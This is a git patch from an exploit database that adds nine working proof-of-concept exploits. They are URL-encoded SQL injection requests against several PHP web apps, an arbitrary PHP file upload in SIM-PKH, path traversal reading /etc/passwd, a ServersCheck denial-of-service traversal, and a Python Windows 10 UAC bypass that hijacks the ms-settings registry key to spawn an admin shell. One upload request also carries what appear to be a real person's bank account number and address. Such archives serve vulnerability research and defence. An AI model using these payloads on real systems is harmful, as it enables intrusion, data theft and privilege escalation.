From 4f60a3d8f275b325e92debbe02a6d9c0471ad513 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 24 Oct 2018 05:02:04 +0000 Subject: [PATCH] DB: 2018-10-24 9 changes to exploits/shellcodes AudaCity 2.3 - Denial of Service (PoC) Audacity 2.3 - Denial of Service (PoC) ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC) Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass) Appsource School Management System 1.0 - 'student_id' SQL Injection SIM-PKH 2.4.1 - Arbitrary File Upload ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection School ERP Pro+Responsive 1.0 - Arbitrary File Download School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection --- exploits/php/webapps/45657.txt | 58 ++++++++++ exploits/php/webapps/45659.txt | 173 +++++++++++++++++++++++++++++ exploits/php/webapps/45662.txt | 64 +++++++++++ exploits/php/webapps/45663.txt | 34 ++++++ exploits/php/webapps/45664.txt | 35 ++++++ exploits/windows/dos/45658.txt | 41 +++++++ exploits/windows/local/45660.py | 48 ++++++++ exploits/windows/webapps/45661.txt | 58 ++++++++++ exploits/windows/webapps/45665.txt | 35 ++++++ files_exploits.csv | 11 +- 10 files changed, 556 insertions(+), 1 deletion(-) create mode 100644 exploits/php/webapps/45657.txt create mode 100644 exploits/php/webapps/45659.txt create mode 100644 exploits/php/webapps/45662.txt create mode 100644 exploits/php/webapps/45663.txt create mode 100644 exploits/php/webapps/45664.txt create mode 100644 exploits/windows/dos/45658.txt create mode 100755 exploits/windows/local/45660.py create mode 100644 exploits/windows/webapps/45661.txt create mode 100644 exploits/windows/webapps/45665.txt diff --git a/exploits/php/webapps/45657.txt b/exploits/php/webapps/45657.txt new file mode 100644 index 000000000..10f56981c --- /dev/null +++ b/exploits/php/webapps/45657.txt @@ -0,0 +1,58 @@ +# Exploit Title: Appsource School Management System 1.0 - 'student_id' SQL Injection +# Dork: N/A +# Date: 2018-10-19 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.appsource.ug/school/ +# Software Link: https://sourceforge.net/p/appsource-school-system/code/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# Description +# Librarian, Teacher members can run the sql codes. + +# POC: +# 1) +# http://localhost/[PATH]/index.php?page=subject_allocation&teacher_id=[SQL]&selection_type=allocate_new_subject&token= + +GET /[PATH]/index.php?page=subject_allocation&teacher_id=%2d%33%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d&selection_type=allocate_new_subject&token=6f241aabc241c0f1567f2eef2eb9605f HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: __test=0873e299cd6c3e39a7898a55d9894bc6; PHPSESSID=6ac2af1ef1b06c03438adef38b554175 +Connection: keep-alive +HTTP/1.1 200 OK +Server: nginx +Date: Fri, 19 Oct 2018 10:52:53 GMT +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked +Connection: keep-alive +Vary: Accept-Encoding +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache + +# POC: +# 2) +# http://localhost/[PATH]/index.php?page=give_studentbook&action=borror_book&student_id=[SQL] + +GET /[PATH]/index.php?page=give_studentbook&action=borror_book&student_id=%31%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: __test=0873e299cd6c3e39a7898a55d9894bc6; PHPSESSID=6ac2af1ef1b06c03438adef38b554175 +Connection: keep-alive +HTTP/1.1 200 OK +Server: nginx +Date: Fri, 19 Oct 2018 10:58:27 GMT +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked +Connection: keep-alive +Vary: Accept-Encoding +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache \ No newline at end of file diff --git a/exploits/php/webapps/45659.txt b/exploits/php/webapps/45659.txt new file mode 100644 index 000000000..eb9bfd348 --- /dev/null +++ b/exploits/php/webapps/45659.txt @@ -0,0 +1,173 @@ +# Exploit Title: SIM-PKH 2.4.1 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-10-22 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://simpkh.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/simpkh/files/latest/download +# Version: 2.4.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 2) +# Everyone.... + +
+ + +
+ +# Upload Path: http://localhost/[PATH]/foto/59phpinfo2.php + +POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------10453613844351558052030056362 +Content-Length: 261 +-----------------------------10453613844351558052030056362 +Content-Disposition: form-data; name="fupload"; filename="phpinfo2.php" +Content-Type: application/force-download + +-----------------------------10453613844351558052030056362-- +HTTP/1.1 200 OK +Date: Mon, 22 Oct 2018 15:59:01 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 5554 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +# http://localhost/[PATH]/foto/59phpinfo2.php + +GET /sim-pkh/foto/59phpinfo2.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 22 Oct 2018 15:59:28 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# Users.... +# http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update + +# Upload Path: http://localhost/[PATH]/foto/25phpinfo.php + +POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: [PATH]/admin/media.php?module=pengurus&act=editpengurus&id=320323241474 +Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------84876618815601613714142368 +Content-Length: 2745 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="id_pengurus" +320323241474 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="no_rekening" +0401741906 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="nama" +IMAS + +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="tempat" +SUKABUMI +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="tl" +1985-11-08 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="Usia" +33 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="fupload"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="pekerjaan" +BURUH +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="ibu_kandung" +ELIS +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="suami" +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="alamat" +KP BABAKAN RT 09 RW 02 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="no_hp" +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="id_desa" +4 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="id_kelompok" +13 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="id_jabatan" +2 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="id_status" +1 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="id_pendamping" +pdp-01 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="bumil" +0 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="balita" +1 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="apras" +1 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="sd" +0 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="smp" +2 +-----------------------------84876618815601613714142368 +Content-Disposition: form-data; name="sma" +0 +-----------------------------84876618815601613714142368-- +HTTP/1.1 302 Found +Date: Mon, 22 Oct 2018 15:42:39 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: ../../media.php?module=pengurus +Content-Length: 1976 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45662.txt b/exploits/php/webapps/45662.txt new file mode 100644 index 000000000..3332691d0 --- /dev/null +++ b/exploits/php/webapps/45662.txt @@ -0,0 +1,64 @@ +# Exploit Title: School ERP Pro+Responsive 1.0 - Arbitrary File Download +# Dork: N/A +# Date: 2018-10-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.arox.in/ +# Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download +# Software Link: http://erp.arox.in/ http://erp1.arox.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/student_staff/download.php?document=[FILE] +# http://localhost/[PATH]/office_admin/download.php?document=[FILE] +# +# /[PATH]/student_staff/download.php +# /[PATH]/office_admin/download.php +# .... +# if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") { +# $file = $_REQUEST['document']; +# header("Content-type: application/force-download"); +# header("Content-Transfer-Encoding: Binary"); +# header("Content-length: ".filesize($file)); +# header("Content-disposition: attachment; filename=\"".$file."\""); +# readfile($file); +# exit; +# } +# .... + +GET /[PATH]/student_staff/download.php?document=download.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Tue, 23 Oct 2018 12:30:01 GMT +Server: Apache +Content-Transfer-Encoding: Binary +Content-Disposition: attachment; filename="download.php" +Content-Length: 337 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download + +GET /[PATH]/office_admin/download.php?document=../../../../../etc/passwd HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Tue, 23 Oct 2018 12:31:34 GMT +Server: Apache +Content-Transfer-Encoding: Binary +Content-Disposition: attachment; filename="../../../../../etc/passwd" +Content-Length: 46368 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download \ No newline at end of file diff --git a/exploits/php/webapps/45663.txt b/exploits/php/webapps/45663.txt new file mode 100644 index 000000000..577b49f8a --- /dev/null +++ b/exploits/php/webapps/45663.txt @@ -0,0 +1,34 @@ +# Exploit Title: School ERP Pro+Responsive 1.0 - 'fid' SQL Injection +# Dork: N/A +# Date: 2018-10-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.arox.in/ +# Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download +# Software Link: http://erp.arox.in/ http://erp1.arox.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/student_staff/?pid=54&action=staff_timetable&fid=[SQL] + +GET /[PATH]/student_staff/?pid=54&action=staff_timetable&fid=-%31%20%75%6e%49%6f%4e%20%73%45%6c%45%63%74%20%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=nno01rkuj0ql0k1sb96uhg1va1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Tue, 23 Oct 2018 12:11:18 GMT +Server: Apache +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 68790 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45664.txt b/exploits/php/webapps/45664.txt new file mode 100644 index 000000000..28c0732ec --- /dev/null +++ b/exploits/php/webapps/45664.txt @@ -0,0 +1,35 @@ +# Exploit Title: SIM-PKH 2.4.1 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-10-22 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://simpkh.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/simpkh/files/latest/download +# Version: 2.4.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Users.... +# http://localhost/[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=[SQL] + +GET /[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=-1%27++UniOn(sELect+0x283129%2cCONCAT(0x203a20,User(),DatabaSE(),VErsiON())%2c0x283329%2c0x283429%2c0x283529%2c%30%78%32%38%33%36%32%39%2c0x283729%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c%30%78%32%38%33%31%33%37%32%39%2c0x28313829%2c0x28313929%2c0x28323029%2c%30%78%32%38%33%32%33%31%32%39%2c0x28323229)--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 22 Oct 2018 15:31:42 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/dos/45658.txt b/exploits/windows/dos/45658.txt new file mode 100644 index 000000000..88f636cec --- /dev/null +++ b/exploits/windows/dos/45658.txt @@ -0,0 +1,41 @@ +# Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC) +# Author: John Page (aka hyp3rlinx) +# Date: 2018-10-23 +# Vendor: www.serverscheck.com +# Software Link: http://downloads.serverscheck.com/monitoring_software/setup.exe +# CVE: N/A +# References: +# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18552-SERVERSCHECK-MONITORING-SOFTWARE-ARBITRARY-FILE-WRITE-DOS.txt +# https://serverscheck.com/monitoring-software/release.asp +# Affected Component: "sensor_details.html" webpage the "id" parameter + +# Security Issue +# ServersCheck Monitoring Software allows remote attackers to cause a denial of service +# (menu functionality loss) by creating an LNK file that points to a second LNK file, if this +# second LNK file is associated with a Start menu item. Ultimately, this behavior comes +# from a Directory Traversal bug (via the sensor_details.html id parameter) that allows +# creating empty files in arbitrary directories. + +# Exploit/POC +# DOS Command Prompt .LNK under Start Menu change to desired user. + +http://127.0.0.1:1272/sensor_details.html?id=../../../../Users//AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Command%20Prompt.lnk%00 + +# DOS Run .LNK under Start Menu + +http://127.0.0.1:1272/sensor_details.html?id=../../../../Users//AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Run.lnk%00 + +# DOS Internet Explorer .LNK from Start Menu +http://127.0.0.1:1272/sensor_details.html?id=../../../../Users//AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Internet Explorer.LNK%00 + +# Victim will get error message from server like "Error retrieving sensor details from database". +# Then,No Internet Explorer, Command or Run prompt via the Start/Programs/Accessories/ +# and Task Menu links. However, can still be launch by other means. Tested successfully on +# Windows 7 OS + +# [Disclosure Timeline] +# Vendor Notification: October 6, 2018 +# Vendor acknowledgement: October 7, 2018 +# Vendor release v14.3.4 : October 7th, 2018 +# CVE assign by Mitre: October 21, 2018 +# October 22, 2018 : Public Disclosure \ No newline at end of file diff --git a/exploits/windows/local/45660.py b/exploits/windows/local/45660.py new file mode 100755 index 000000000..f61e2f77b --- /dev/null +++ b/exploits/windows/local/45660.py @@ -0,0 +1,48 @@ +#!/usr/bin/env python +# +# Exploit Title: Windows 10 UAC Bypass by computerDefault +# Date: 2018-10-18 +# Exploit Author: Fabien DROMAS - Security consultant @ Synetis +# Twitter: st0rnpentest +# +# Vendor Homepage: www.microsoft.com +# Version: Version 10.0.17134.285 +# Tested on: Windows 10 pro Version 10.0.17134.285 +# + +import os +import sys +import ctypes +import _winreg + + +def create_reg_key(key, value): + try: + _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command') + registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE) + _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) + _winreg.CloseKey(registry_key) + except WindowsError: + raise + +def exec_bypass_uac(cmd): + try: + create_reg_key('DelegateExecute', '') + create_reg_key(None, cmd) + except WindowsError: + raise + +def bypass_uac(): + try: + current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__ + cmd = "C:\windows\System32\cmd.exe" + exec_bypass_uac(cmd) + os.system(r'C:\windows\system32\ComputerDefaults.exe') + return 1 + except WindowsError: + sys.exit(1) + +if __name__ == '__main__': + + if bypass_uac(): + print "Enjoy your Admin Shell :)" \ No newline at end of file diff --git a/exploits/windows/webapps/45661.txt b/exploits/windows/webapps/45661.txt new file mode 100644 index 000000000..0eed29fa5 --- /dev/null +++ b/exploits/windows/webapps/45661.txt @@ -0,0 +1,58 @@ +# Exploit Title: ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection +# Author: John Page (aka hyp3rlinx) +# Date: 2018-10-23 +# Vendor: www.serverscheck.com +# Software link: http://downloads.serverscheck.com/monitoring_software/setup.exe +# CVE: N/A +# References: +# https://serverscheck.com/monitoring-software/release.asp +# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt + +# Security Issue +# ServersCheck Monitoring Software allows for SQL Injection by an authenticated user +# via the alerts.html "id" parameter. + +# Exploit/POC +http://127.0.0.1:1272/alerts.html?id=18391 + +Result: +Alerts History for SENSORXY +No data available in table + +Then using 'OR+2=2, + +http://127.0.0.1:1272/alerts.html?id=18391+'OR+2=2+--+ + +Result: + +Alerts History for test +155 a day ago CPU on 127.0.0.1 Status Change DOWN to OK +154 a day ago CPU on 127.0.0.1 Status Change OK to DOWN +153 a day ago test Status Change OK to DOWN Unable to connect to host + + +# SQL Injection - original page results successfully manipulated using 18391-2 +# Examples: + +http://127.0.0.1:1272/alerts.html?id=18391 +No data available in table + +Then using 34 minus 2, + +http://127.0.0.1:1272/alerts.html?id=18391-2 +153 a day ago test Status Change OK to DOWN Unable to connect to host + +and minus 1, + +http://127.0.0.1:1272/alerts.html?id=18391-1 +155 a day ago CPU on 127.0.0.1 Status Change DOWN to OK +154 a day ago CPU on 127.0.0.1 Status Change OK to DOWN + + +http://127.0.0.1:1272/floorplans.html?floorplan=34 +Floor Plan PLANXY + +Then using 34 minus 2, + +http://127.0.0.1:1272/floorplans.html?floorplan=34-2 +Floor Plan 0 \ No newline at end of file diff --git a/exploits/windows/webapps/45665.txt b/exploits/windows/webapps/45665.txt new file mode 100644 index 000000000..e3fe0845c --- /dev/null +++ b/exploits/windows/webapps/45665.txt @@ -0,0 +1,35 @@ +# Exploit Title: MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-10-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.m-gb.org/ +# Software Link: https://sourceforge.net/projects/mopzz-gb/files/latest/download +# Version: 0.7.0.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/email.php?id=[SQL] + +GET /[PATH]/email.php?id=admin%27++uniOn+selEct+(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%32%2c%33%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Tue, 23 Oct 2018 15:50:23 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Set-Cookie: newentry=rjic8lu5atciee1fsacguocub3; path=/ +Set-Cookie: newentry=jd795jb06ni96fqhir90cahhp7; path=/ +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8af0f066f..79cbdf345 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6148,13 +6148,14 @@ id,file,description,date,author,type,platform,port 45572,exploits/windows/dos/45572.js,"Microsoft Edge Chakra JIT - Type Confusion",2018-10-09,"Google Security Research",dos,windows, 45579,exploits/android/dos/45579.txt,"WhatsApp - RTP Processing Heap Corruption",2018-10-10,"Google Security Research",dos,android, 45641,exploits/windows_x86/dos/45641.py,"Modbus Poll 7.2.2 - Denial of Service (PoC)",2018-10-22,"Cemal Cihad ÇİFTÇİ",dos,windows_x86, -45644,exploits/windows/dos/45644.pl,"AudaCity 2.3 - Denial of Service (PoC)",2018-10-22,"Kağan Çapar",dos,windows, +45644,exploits/windows/dos/45644.pl,"Audacity 2.3 - Denial of Service (PoC)",2018-10-22,"Kağan Çapar",dos,windows, 45647,exploits/macos/dos/45647.c,"Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking",2018-10-22,"Google Security Research",dos,macos, 45648,exploits/multiple/dos/45648.txt,"Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem",2018-10-22,"Google Security Research",dos,multiple, 45649,exploits/ios/dos/45649.txt,"Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value",2018-10-22,"Google Security Research",dos,ios, 45650,exploits/multiple/dos/45650.txt,"Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory",2018-10-22,"Google Security Research",dos,multiple, 45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple, 45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios, +45658,exploits/windows/dos/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)",2018-10-23,hyp3rlinx,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10046,6 +10047,7 @@ id,file,description,date,author,type,platform,port 45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86, 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux, 45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, +45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40171,3 +40173,10 @@ id,file,description,date,author,type,platform,port 45654,exploits/php/webapps/45654.txt,"eNdonesia Portal 8.7 - 'artid' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php, 45655,exploits/php/webapps/45655.txt,"The Open ISES Project 3.30A - Arbitrary File Download",2018-10-22,"Ihsan Sencan",webapps,php, 45656,exploits/php/webapps/45656.txt,"Viva 